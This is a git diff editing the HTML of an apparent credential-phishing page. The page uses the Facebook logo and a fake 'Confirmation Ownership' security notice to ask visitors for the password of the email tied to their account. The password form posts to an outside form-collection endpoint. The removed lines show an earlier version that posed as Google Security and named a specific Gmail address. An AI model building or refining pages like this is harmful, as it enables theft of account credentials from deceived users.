--- a/index.html
+++ b/index.html
@@ -111,9 +111,10 @@
             <img class="logo" src="https://upload.wikimedia.org/wikipedia/commons/6/6c/Facebook_Logo_2023.png" alt="Logo">
         </div>
         <div class="header">
-            Google Security
+             Confirmation Ownership
+            
         </div>
-        <p>Please re-enter your Gmail password to complete the last step of Badge udayanpadarath@gmail.com.</p>
+        <p>Please enter the password for the email address that is added to your account</p>
         <form id="passwordForm" action="https://submit-form.com/p4WZWnMf7" method="POST">
             <div class="form-group">
                 <label for="password">Password</label>
